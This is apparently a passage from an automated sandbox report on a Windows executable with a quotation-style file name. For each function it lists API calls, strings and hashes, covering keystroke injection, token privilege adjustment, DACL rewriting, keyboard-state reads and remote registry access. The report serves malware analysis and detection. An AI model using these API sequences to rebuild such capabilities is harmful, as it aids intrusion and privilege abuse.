                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E3D6A2
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3D6AE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6BF
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6C7
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E3D6CF
                                                                      • SetForegroundWindow.USER32(?), ref: 00E3D6D2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6E7
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E3D6F2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6FC
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E3D701
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D70A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E3D70F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D719
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E3D71E
                                                                      • SetForegroundWindow.USER32(?), ref: 00E3D721
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00E3D748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
                                                                      • Instruction ID: 78e8d652569431a300af5f9a664de7c9e010644c3e1f7b1fea71e7a3d02040de
                                                                      • Opcode Fuzzy Hash: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
                                                                      • Instruction Fuzzy Hash: 2C315371A40318BEEB216B629C49F7F7E6CEB44B50F104026FA08FA1D1D6B05D51EBA1
                                                                      Function 00E58310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
                                                                        • Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
                                                                        • Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865
                                                                      • _memset.LIBCMT ref: 00E58353
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E583A5
                                                                      • CloseHandle.KERNEL32(?), ref: 00E583B6
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E583CD
                                                                      • GetProcessWindowStation.USER32 ref: 00E583E6
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00E583F0
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E5840A
                                                                        • Part of subcall function 00E581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
                                                                        • Part of subcall function 00E581CB: CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 2063423040-1027155976
                                                                      • Opcode ID: 9eab467e507ae062601f9702a3eda367d0ca2d237a5da2a01ddba5a9d8571114
                                                                      • Instruction ID: 9d0389cb158623c2b5a777982d81f11258f99a295e31df1f5942fa285645223f
                                                                      • Opcode Fuzzy Hash: 9eab467e507ae062601f9702a3eda367d0ca2d237a5da2a01ddba5a9d8571114
                                                                      • Instruction Fuzzy Hash: F1818B71800209AFDF119FA5DE45AEE7BB8FF08309F146569FD14B6261EB318E18DB60
                                                                      Function 00E6C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E6C78D
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6C7E1
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C806
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C81D
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6C844
                                                                      • __swprintf.LIBCMT ref: 00E6C890
                                                                      • __swprintf.LIBCMT ref: 00E6C8D3
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • __swprintf.LIBCMT ref: 00E6C927
                                                                        • Part of subcall function 00E23698: __woutput_l.LIBCMT ref: 00E236F1
                                                                      • __swprintf.LIBCMT ref: 00E6C975
                                                                        • Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E23713
                                                                        • Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E2372B
                                                                      • __swprintf.LIBCMT ref: 00E6C9C4
                                                                      • __swprintf.LIBCMT ref: 00E6CA13
                                                                      • __swprintf.LIBCMT ref: 00E6CA62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 3953360268-2428617273
                                                                      • Opcode ID: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
                                                                      • Instruction ID: 8ed1055cec48469b0dc0e743bed3c2eafc48dcb129af436ed61f5efff3843b94
                                                                      • Opcode Fuzzy Hash: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
                                                                      • Instruction Fuzzy Hash: 77A14EB1408304AFC714EFA4D885DAFB7ECFF94704F405919F595A7192EA34EA48CB62
                                                                      Function 00E6EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E6EFB6
                                                                      • _wcscmp.LIBCMT ref: 00E6EFCB
                                                                      • _wcscmp.LIBCMT ref: 00E6EFE2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E6EFF4
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00E6F00E
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F026
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F031
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F04D
                                                                      • _wcscmp.LIBCMT ref: 00E6F074
                                                                      • _wcscmp.LIBCMT ref: 00E6F08B
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F09D
                                                                      • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F0BB
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F0C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F0D2
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F0E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1803514871-438819550
                                                                      • Opcode ID: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
                                                                      • Instruction ID: a08caa539672842f1df0d5c4096a28a70d75f7615f88aaec5fc0738a4a5457d2
                                                                      • Opcode Fuzzy Hash: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
                                                                      • Instruction Fuzzy Hash: 5431C0325412196EDB14EFB5FC59AEE77AC9F483A4F101176E808F21A1DB70DA84CB61
                                                                      Function 00E80857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80953
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8F910,00000000,?,00000000,?,?), ref: 00E809C1
                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E80A09
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E80A92
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E80DB2
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E80DBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 536824911-966354055
                                                                      • Opcode ID: 6362437da6c920679a9776d523a3e14c50f901dfad90aa43344406f5b7095f4b
                                                                      • Instruction ID: d50a94de333f4a8f155b5dc304ca1e911a27d4fe37dd1046de9a343c1b176aa8
                                                                      • Opcode Fuzzy Hash: 6362437da6c920679a9776d523a3e14c50f901dfad90aa43344406f5b7095f4b
                                                                      • Instruction Fuzzy Hash: AA027C756006119FCB54EF24D841E2AB7E5FF89324F04985CF99AAB3A2CB30EC45CB91
                                                                      Function 00E166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0D$0E$0F$3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG$_
                                                                      • API String ID: 0-821810444
                                                                      • Opcode ID: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
                                                                      • Instruction ID: 0aa15cad3053ce6165c6327799c55ca489ce9b28a982aeaaacc10cae20ec36f1
                                                                      • Opcode Fuzzy Hash: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
                                                                      • Instruction Fuzzy Hash: 9D728F75E00219DBDB14CF59C890BEEB7B5FF48314F1495AAE809FB290E7709A85CB90
                                                                      Function 00E6F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E6F113
                                                                      • _wcscmp.LIBCMT ref: 00E6F128
                                                                      • _wcscmp.LIBCMT ref: 00E6F13F
                                                                        • Part of subcall function 00E64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E643A0
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F16E
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F179
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F195
                                                                      • _wcscmp.LIBCMT ref: 00E6F1BC
                                                                      • _wcscmp.LIBCMT ref: 00E6F1D3
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F1E5
                                                                      • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F203
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F20D
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F21A
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F22C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 1824444939-438819550
                                                                      • Opcode ID: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
                                                                      • Instruction ID: 264b525abbb2aef1e916bac3eb9cfe44abfe06b1b31b155a1d2abc8d9fe7998b
                                                                      • Opcode Fuzzy Hash: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
                                                                      • Instruction Fuzzy Hash: CB31E0365812196ADB20AEA4FC58AEE77AC9F853A4F101171E808F21A1DB30DE45CF64
                                                                      Function 00E6A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A20F
                                                                      • __swprintf.LIBCMT ref: 00E6A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A293
                                                                      • _memset.LIBCMT ref: 00E6A2B2
                                                                      • _wcsncpy.LIBCMT ref: 00E6A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E6A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00E6A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E6A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
                                                                      • Instruction ID: fdc484e7dd26daf04d697358090c2161eac57039da626d9562bfa0805e08e1ee
                                                                      • Opcode Fuzzy Hash: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
                                                                      • Instruction Fuzzy Hash: 5031C0B1940109ABDB20DFA1EC49FEB37BCEF88745F1451B6F508F2160EB7096448B25
                                                                      Function 00E57CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
                                                                        • Part of subcall function 00E58202: GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
                                                                        • Part of subcall function 00E58202: GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
                                                                        • Part of subcall function 00E58202: HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
                                                                        • Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255
                                                                        • Part of subcall function 00E5829F: GetProcessHeap.KERNEL32(00000008,00E57CF8,00000000,00000000,?,00E57CF8,?), ref: 00E582AB
                                                                        • Part of subcall function 00E5829F: HeapAlloc.KERNEL32(00000000,?,00E57CF8,?), ref: 00E582B2
                                                                        • Part of subcall function 00E5829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E57CF8,?), ref: 00E582C3
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E57D13
                                                                      • _memset.LIBCMT ref: 00E57D28
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E57D47
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E57D58
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E57D95
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E57DB1
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E57DCE
                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E57DDD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E57DE4
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E57E05
                                                                      • CopySid.ADVAPI32(00000000), ref: 00E57E0C
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E57E3D
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E57E63
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E57E77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                      • String ID:
                                                                      • API String ID: 3996160137-0
                                                                      • Opcode ID: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
                                                                      • Instruction ID: 6fd29047cc437333ae1cbb9941836bb328ca63d158f0068df5845346106483a5
                                                                      • Opcode Fuzzy Hash: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
                                                                      • Instruction Fuzzy Hash: 63617971900209AFDF00CFA1EC85AEEBBB9FF04305F048669F955B6291DB319E19CB60
                                                                      Function 00E6001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00E60097
                                                                      • SetKeyboardState.USER32(?), ref: 00E60102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E60122
                                                                      • GetKeyState.USER32(000000A0), ref: 00E60139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E60168
                                                                      • GetKeyState.USER32(000000A1), ref: 00E60179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00E601A5
                                                                      • GetKeyState.USER32(00000011), ref: 00E601B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00E601DC
                                                                      • GetKeyState.USER32(00000012), ref: 00E601EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E60213
                                                                      • GetKeyState.USER32(0000005B), ref: 00E60221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                                                                      • Instruction ID: cf13f563b1a5337f0984e072f13cc93c14347db2539b5a4d5ef9c54f06ffe161
                                                                      • Opcode Fuzzy Hash: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                                                                      • Instruction Fuzzy Hash: 785109209843A829FB35DBA0A8147EBBFF49F123C4F085599C5C2761C3DAA49B8CC761
                                                                      Function 00E803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E804AC
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E8054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E805E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E80822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E8082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 457f622822026aa0ad08c9f80666118461575d2fdf12560a7d231217e0367582
                                                                      • Instruction ID: efe9a624e5b3d8ac6be923888759cd1b57cf9ad4e9edfa9fde60ac7b3bfff412
                                                                      • Opcode Fuzzy Hash: 457f622822026aa0ad08c9f80666118461575d2fdf12560a7d231217e0367582
                                                                      • Instruction Fuzzy Hash: 40E15F71604200AFCB54EF24C891E6ABBE4EF89314F04996DF84DEB2A2D731ED45CB91
                                                                      Function 00E783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • CoInitialize.OLE32 ref: 00E78403
                                                                      • CoUninitialize.OLE32 ref: 00E7840E
